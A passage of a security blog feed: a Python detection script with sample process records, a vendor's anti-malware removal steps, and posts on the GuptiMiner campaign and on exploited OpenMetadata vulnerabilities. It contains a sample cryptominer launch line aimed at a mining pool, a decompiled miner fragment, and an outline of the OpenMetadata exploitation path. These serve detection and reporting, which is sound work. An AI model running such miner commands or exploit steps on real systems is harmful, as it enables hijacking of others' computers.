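    set /a CPU=%NUMBER_OF_PROCESSORS%/2+1 (cmd.exe integer division)."""
    return number_of_processors // 2 + 1


def _flag_value(args: list, name: str) -> Optional[str]:
    """Value following a short option such as -u or -t, or None if absent."""
    for i, arg in enumerate(args):
        if arg.lower() == name and i + 1 < len(args):
            return args[i + 1]
    return None


def parse_miner_cmdline(cmdline: str) -> Optional[dict]:
    """Pool, login, algorithm and thread count from a miner launch line;
    None when the command line carries no stratum URL."""
    match = STRATUM_RE.search(cmdline)
    if match is None:
        return None
    args = cmdline.split()
    threads = _flag_value(args, "-t")
    return {
        "pool": match.group("host"),
        "port": int(match.group("port")),
        "login": _flag_value(args, "-u"),
        "algo": _flag_value(args, "-a"),
        # an unexpanded %cpu% or a missing -t gives None rather than a crash
        "threads": int(threads) if threads and threads.isdigit() else None,
    }


def csrss_out_of_place(name: str, image_path: str) -> bool:
    """True when a process is named csrss.exe but its image is outside System32.
    ntpath.normpath unifies slashes and collapses '..', so a dressed-up path
    cannot slip past a plain string comparison."""
    if name.lower() != "csrss.exe":
        return False
    folder = ntpath.dirname(ntpath.normpath(image_path))
    return folder.lower() != SYSTEM32.lower()


def triage(processes: list) -> list:
    """Run both checks; each finding is (pid, reason, details)."""
    findings = []
    for proc in processes:
        if csrss_out_of_place(proc["name"], proc["path"]):
            findings.append((proc["pid"], "csrss.exe outside System32", {"path": proc["path"]}))
        miner = parse_miner_cmdline(proc.get("cmdline", ""))
        if miner is not None:
            findings.append((proc["pid"], "stratum miner command line", miner))
    return findings


# Constructed process records: a genuine csrss.exe, the trojan's decoy in the
# drop folder named in the text, and its miner launch line (login replaced by a
# placeholder; -t 3 is what the batch formula yields on a 4-processor machine).
MINER_LINE = ("Srvanyx -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 "
              "-u login@example.invalid -p x -t 3")
SAMPLE_PROCESSES = [
    {"pid": 612, "name": "csrss.exe", "path": r"C:\Windows\System32\csrss.exe",
     "cmdline": r"%SystemRoot%\system32\csrss.exe ObjectDirectory=\Windows"},
    {"pid": 4120, "name": "Csrss.exe", "path": r"C:\Windows\MicrosoftU\Csrss.exe",
     "cmdline": r"C:\Windows\MicrosoftU\Csrss.exe"},
    {"pid": 4188, "name": "Srvanyx.exe", "path": r"C:\Windows\MicrosoftU\Srvanyx.exe",
     "cmdline": MINER_LINE},
]
```

On a live host the same functions can be fed from a process enumeration (Sysmon event 1 or a `Get-Process` export); `triage(SAMPLE_PROCESSES)` flags the decoy and the miner but not the genuine csrss.exe.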

GridinSoft Anti-Malware main screen

Download and install Anti-Malware by clicking the button below. After the installation, run a Full scan: this will check all the volumes present in the system, including hidden folders and system files. Scanning will take around 15 minutes.

After the scan, you will see the list of detected malicious and unwanted elements. It is possible to adjust the actions the anti-malware program takes on each element: click "Advanced mode" and see the options in the drop-down menus. You can also see extended information about each detection – malware type, effects and potential source of infection.

Scan results screen

Click "Clean Now" to start the removal process. Important: the removal process may take several minutes when there are a lot of detections. Do not interrupt it, and you will get your system as clean as new.

Removal finished

GuptiMiner Use eScan to Spread Miners and Backdoors
https://gridinsoft.com/blogs/guptiminer-escan-miners-backdoors/ – Thu, 25 Apr 2024 12:58:14 +0000

A recent report by Avast researchers identified an old-timer malware called GuptiMiner. It uses the eScan antivirus update mechanism to stealthily inject backdoors and cryptocurrency mining programs into users’ computer systems and large corporate networks. This is further evidence that cybercriminals are adapting their techniques to bypass modern security measures. Let’s look at the situation.

Campaign discovery and GuptiMiner

Avast specialists analyzed the activity of the GuptiMiner malware active since 2018. GuptiMiner is a sophisticated malware that aims at spreading backdoors and performing hidden cryptomining in corporate networks. The malware utilizes a multi-stage infection chain. It starts by hijacking antivirus software updates through man-in-the-middle (MitM) attacks. This allows attackers to substitute legitimate updates for malicious ones.

Avast informed eScan and India CERT of the vulnerability it found, which was successfully patched on July 31, 2023. However, since users rarely install more than one antivirus, this limits the ability to detect and analyze the full scope of GuptiMiner's activities.

GuptiMiner’s infection chain

This malware uses a complex infection chain. The attack starts by intercepting eScan antivirus updates. The update package is downloaded from the server, but an attacker sitting in its path substitutes it with a malicious one. Next, eScan downloads and decompresses the package, initiating the infection chain through a DLL. This DLL lets the malware control further downloads and code execution.

GuptiMiner is requesting the payload from a real IP address

Next, GuptiMiner uses a sideloading technique to inject malicious code into trusted processes, which allows the program to remain invisible to antivirus systems. The malware also communicates with remote command and control (C2) servers to receive commands and updates. This allows attackers to control infected systems, run additional malicious processes, or conduct cryptocurrency mining.

How does GuptiMiner work?

GuptiMiner analysis revealed that the malware used a variety of sophisticated techniques to install itself and hide its presence on the system. Key techniques included DLL sideloading, modifying system files, and using forged digital signatures to simulate legitimacy.

Also, one of the characteristic features of GuptiMiner is its ability to modularize infections. This includes performing DNS queries to the attacker’s DNS servers and extracting useful data from innocent-looking images. In addition to its core functionality of installing backdoors, GuptiMiner unexpectedly spreads the XMRig miner used to mine the Monero cryptocurrency.

The process of dynamically assigning mining threads for XMRig (decompiled):

xmrig_shellcode_copy_ = xmrig_shellcode_copy;
num_cores_ = num_cores;
dword_140020908 = 25;
xmrig_shellcode_copy->max_cpu_usage = '53';
xmrig_shellcode_copy_->threads = '1';
if ( num_cores_ >= 6 )
    xmrig_shellcode_copy_->threads = '2';
if ( num_cores_ >= 8 )
    xmrig_shellcode_copy_->threads = '3';

The malware has been identified as potentially linked to the Kimsuky, a prominent North Korean hacking group. This indicates possible state sponsorship and a high degree of organization of the attacks. Before, North Korean hackers showed a certain degree of interest in acquiring cryptocurrency. So, this should not be too much of a surprise.

Two Different types of Backdoors

While analyzing the GuptiMiner malware, researchers identified two different types of backdoors. Both types of backdoors were designed to function as part of a large-scale and well-planned campaign. But each was designed to perform specific tasks on infected corporate networks.

  • The first type of backdoor is a modified version of PuTTY Link, which is used to scan for SMB on the local network. This backdoor allows lateral movement (horizontal propagation of malware within the network) to reach potentially vulnerable systems running Windows 7 and Windows Server 2008, facilitating the exploitation of vulnerabilities in legacy operating systems.
  • The second type of backdoor is multifunctional and modular. It accepts commands from the attacker to install additional modules and specializes in finding and stealing locally stored private keys and cryptocurrency wallets. This approach allows attackers to monitor infected systems for long periods of time and activate additional malicious features if necessary.

OpenMetadata Vulnerabilities Exploited to Abuse Kubernetes
https://gridinsoft.com/blogs/openmetadata-vulnerabilities-exploited-kubernetes/ – Mon, 22 Apr 2024 23:07:21 +0000

Microsoft security blog reports that the OpenMetadata platform has critical vulnerabilities that allow attackers to exploit Kubernetes workloads for crypto mining. Five vulnerabilities allow attackers to bypass authentication and execute Remote Code Execution. Microsoft recommends updating to OpenMetadata and employing robust authentication measures.

OpenMetadata Vulnerabilities Threaten Kubernetes Workloads, Actively Exploited

According to a recent Microsoft security blog post, attackers leverage critical vulnerabilities in the OpenMetadata platform to infiltrate Kubernetes workloads. These vulnerabilities (CVE-2024-28255, CVE-2024-28847, CVE-2024-28253, CVE-2024-28848, and CVE-2024-28254) affect versions before 1.3.1. They have different CVSS scores, the highest being 9.8 and 9.4 (more on them below). Successful exploitation allows attackers to bypass authentication and achieve remote code execution (RCE).

Additional cryptomining-related malware in the attacker’s server

OpenMetadata is a discovery, observability, and governance platform with a central metadata repository, in-depth lineage, and team collaboration. It has metadata schemas, a metadata store, APIs, and an ingestion framework; its key features include data discovery. Once compromised, however, these workloads become conduits for illicit crypto-mining.

Identifying Critical Vulnerabilities

CVE-2024-28255 is a critical vulnerability (CVSS: 9.8) in the OpenMetadata platform, affecting its API authentication mechanism. In brief, the `JwtFilter` handles API authentication by verifying JWT tokens, but attackers can bypass it by requesting excluded endpoints using path parameters. The developers fixed the issue in version 1.2.4.

The second vulnerability, with a CVSS score of 9.4, stems from JWT token validation deficiencies in JwtFilter. The authorization check `authorizer.authorize()` is called only after `prepareInternal()`, which has by then already executed and evaluated the SpEL expression. To exploit this vulnerability, an attacker can send a PUT request to `/api/v1/policies`. The issue can lead to remote code execution and is fixed in version 1.3.1.

How Does The Attack Work?

The following describes the attack sequence observed in instances where Kubernetes workloads of OpenMetadata accessible via the internet have been compromised. Attackers identify vulnerable versions and exploit the vulnerabilities to gain code execution within the container hosting the compromised OpenMetadata image, thereby obtaining initial access.

Post-infiltration, attackers validate their intrusion and gauge control using a publicly accessible service. They utilize ping requests to domains ending with oast[.]me and oast[.]pro—associated with Interactsh—to confirm successful exploitation and validate connectivity before establishing a command-and-control channel and deploying malicious payloads.

Following successful access confirmation, attackers download crypto-mining malware from a remote server for XMR mining, executed with elevated permissions. It is noteworthy that Microsoft identified the attacker’s server location as China. Additionally, other malware targeting both Linux and Windows operating systems was uncovered on the attacker’s server.

Prevention and Mitigation Measures

To reduce the risk of potential vulnerabilities, we highly recommend updating the image version of clusters hosting OpenMetadata workloads to the latest version—specifically version 1.3.1 or newer. Additionally, if you are making OpenMetadata accessible via the Internet, it is crucial to employ strong authentication mechanisms and avoid using default credentials.
